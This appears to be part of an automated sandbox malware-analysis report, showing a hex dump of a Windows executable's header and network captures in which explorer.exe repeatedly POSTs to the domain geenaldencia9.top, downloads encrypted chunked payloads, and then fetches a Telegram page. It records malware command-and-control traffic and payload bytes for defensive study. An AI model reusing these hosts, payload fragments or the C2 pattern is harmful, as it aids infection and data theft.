08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata |@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  4192.168.2.649774194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:21.890801907 CEST1758OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 126
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.051820040 CEST1946INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:21 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  5192.168.2.649775194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.513164043 CEST1961OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 352
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:22.659954071 CEST1963INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:22 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 36 62 63 30 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 68 9f c0 56 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 5f 9e 87 cd 25 80 78 51 a1 a2 8f 1c 3d d9 1c e0 32 02 50 08 e8 de e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 e1 85 20 59 55 11 5c 7c 3b 66 ab 48 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 99 ca cd 8a 58 d8 06 0e 45 67 15 7d cb ff e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 32 d5 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 f3 97 5e 96 da 19 d1 3a 2d 12 45 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 d5 83 4a 04 38 cd 79 14 2c d2 e8 b1 14 c5 77 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 46 64 cd 25 5c 8d b7 19 25 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 95 32 b3 be 34 56 9b 46 76 99 86 11 00 83 32 42 4a 34 ce ae b4 64 95 36 e1 48 50 67 75 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 f1 b5 60 4a 1f 7d 54 7a 98 6c 39 c0 20 f0 5c 19 6a 16 90 be 07 3c a9 9b 3e 05 28 07 c0 6f 68 60 b9 10 1b eb cc ec 25 15 8e b7 82 7f 9e 50 b6 f7 b9 4e a1 20 49 a0 48 2e 69 87 57 33 6a c6 83 2b 4d 30 ae b8 c6 53 11 a0 57 1e 49 94 bd 77 6c 4d ab 7c 8f ef 22 3d 4e 83 ba 87 7a 8e 56 2d e2 98 0e 7b d0 0e 02 2c 0f 70 b8 98 48 0b a7 b2 ba 08 85 f7 fc 86 42 b7 22 ff f2 da 14 79 8c a6 bb 08 c0 f8 f7 c4 1d 2b 11 95 c8 a7 9a a1 b2 13 3d 1d 0f 1a 1b ed e8 f5 6c 8d 95 15 fb 86 6f ce e7 3d ef bd e9 6e 73 72 e7 f9 a6 f5 c9 6a c4 b3 d3 29 11 4a c4 a5 ce 49 77 ca 15 8d c6 dd 39 6b a5 b3 8b 47 ee 0f 3d 8c da 06 bf 37 87 9d b7 1c bf 2c 58 b2 09 7f 08 d8 f3 c2 ea 4a 26 4e 38 2d 6f 71 54 a7 49 4d 84 99 fb 5d 13 f9 ad a1 81 eb 83 f3 bd 99 93 11 67 c7 2c 31 3f c6 86 8c d8 07 af 63 9f 21 1c a8 1f 19 18 6d 32 cc c3 61 a8 c3 e5 0b 5b 96 23 c4 19 ac d8 8e 34 33 a2 43 77 58 d8 b8 fe 80 3f d8 26 95 43 43 a0 08 f8 fc 22 76 f3 3c f7 0b 64 84 fc 7d 4f 55 be b7 5a c3 d5 c4 a2 0b 2e e9 1e 69 1a de ff 3d c2 03 70 3f 6c dc ce 6a db a3 1c f2 1c 22 bd c2 aa a0 23 ef ba a3 8c cc 82 00 45 59 ff 66 3c 3b f0 b3 cb 67 5a f2 97 24 db 89 fa f0 ec e8 57 2d a2 a1 11 08 b3 66 69 ad 0c 51 96 17 8f 2d db 64 73 84 f7 56 5c 38 c2 d9 09 98 20 14 11 db 2b 43 50 1b 6f b3 27 1d 08 87 90 3f bc fb 99 13 cf cf f5 5b ca 31 c6 c5 a1 a5 91 3a 9e fe 1e e6 5c 32 a2 22 21 d0 34 0b d7 d9 1a ed 8d 10 ae 8d 90 97 57 05 bb a8 43 59 9d 9b e4 d5 f5 cf 2f 92 99 92 ff b3 4f 13 fd 86 0a 9f 46 79 2b
                                                                                                                                                                                                  Data Ascii: 6bc02S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|hV+%gt_%xQ=2P0YObyT=a'4 YU\|;fHXKg[Ge92)g z6XEg}WpJk"H2I?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy^:-E%GkKm@NQ>[J8y,w"JG0Z"?kQTJMQFd%\%&Q#F<pvA>C/CbGB24VFv2BJ4d6HPguPnj6'NGc_,/DO9W%`J}Tzl9 \j<>(oh`%PN IH.iW3j+M0SWIwlM|"=NzV-{,pHB"y+=lo=nsrj)JIw9kG=7,XJ&N8-oqTIM]g,1?c!m2a[#43CwX?&CC"v<d}OUZ.i=p?lj"#EYf<;gZ$W-fiQ-dsV\8 +CPo'?[1:\2"!4WCY/OFy+


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  6192.168.2.649776194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.641227961 CEST2420OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 348
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.797816038 CEST2421INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:23 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  7192.168.2.649777194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:23.893903971 CEST2422OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 287
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:24.056574106 CEST2423INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:23 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 32 61 33 34 65 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 ae 7c 95 e0 5f 29 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 d7 9b 87 cd 75 8f 78 51 a1 a2 8f 8a c5 e6 1c e0 32 02 50 08 68 db e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 61 e3 20 59 53 11 5c 7b c2 4c ab 48 11 80 cd 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 23 19 cc 8a 43 d8 06 0e 45 27 46 7d 2c 16 eb 04 89 f9 d4 57 80 90 70 89 ec f8 60 6b 56 ea a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 9e 70 9f 8a 86 e8 47 5a ad b2 cb 99 64 51 11 87 4a b1 b8 56 b0 40 f6 0a bf 8b 71 91 c0 75 f0 46 01 ff 56 59 27 64 5b 96 da 19 d1 3a 2d 32 42 06 02 23 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 40 d7 d8 03 f3 1e 7b d3 51 e6 49 04 38 4d 7c 14 2c ea e8 b1 14 eb 70 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 5a 50 bc a2 b7 f1 f6 6a 1f a7 e9 4d 51 22 47 64 cd 25 5c 8d b7 77 22 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a4 ed e1 5a fc 37 bc 17 fe 2f 63 9e f8 d8 62 40 42 25 e3 b5 be 34 80 9a 46 3e 99 86 11 02 83 37 42 c2 1a ce ae 30 4b 95 f6 cc 3c 38 02 19 39 dc e6 f6 bc b3 de bb 4e 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 4f bd 44 0f 91 e9 20 b3 9e 90 39 02 97 97 b8 57 25 d5 81 d0 ea b9 7e 4a 08 a5 55 7a 98 6c 39 c0 5e f3 5c 19 6e 63 95 be 67 3d da fa 73 56 6b 5d a1 f4 5e 55 e9 1c 31 eb cd 9c 70 15 8e b9 82 7f 8e 54 a8 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af fd c6 83 21 2a 63 e7 98 af 67 26 95 07 62 61 87 bd f7 3f 67 09 01 8a ef 22 19 75 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 20 2c 0f 1a f9 e9 3b 79 ce 8b bc 08 c6 1c 84 82 42 17 7d 85 d8 36 1f 79 a2 be a7 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 f2 13 3b 75 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 64 f7 64 d8 81 10 22 a1 0e d1 64 cc 1f a7 41 d7 3f ed 62 1d 3f 64 7c 9c e7 f1 a4 c3 73 c1 aa 54 fb 26 83 ab cd e4 03 9b c1 c2 1c 7a 75 87 46 98 84 fe
                                                                                                                                                                                                  Data Ascii: 2a34e2S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|_)+%gtuxQ2Ph0YObyT=a'4a YS\{LHXKg[Ge92)g z6#CE'F},Wp`kV"H2I?o|6NI[LeU[0z;+W~5=PVpGZdQJV@quFVY'd[:-2B#GkKm@@{QI8M|,p"JG0Z"?kQZPjMQ"Gd%\w"&Q#F<pvAZ7/cb@B%4F>7B0K<89Nm6'NGc_,OD 9W%~JUzl9^\ncg=sVk]^U1pTN!{K.iw!*cg&ba?g"uzR{} ,;yB}6yw+;ulo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59dd"dA?b?d|sT&zuF


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  8192.168.2.649784194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.460577965 CEST5380OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.644783020 CEST5382INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:29 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  9192.168.2.649787194.147.85.18680C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Sep 27, 2021 19:34:29.830410957 CEST5383OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 191
                                                                                                                                                                                                  Host: geenaldencia9.top
                                                                                                                                                                                                  Sep 27, 2021 19:34:30.035245895 CEST5384INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:29 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.649837149.154.167.99443
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  2021-09-27 17:35:20 UTC0OUTGET /hcdrom1 HTTP/1.1
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                  2021-09-27 17:35:20 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:35:20 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Content-Length: 4452
                                                                                                                                                                                                  Connection: close
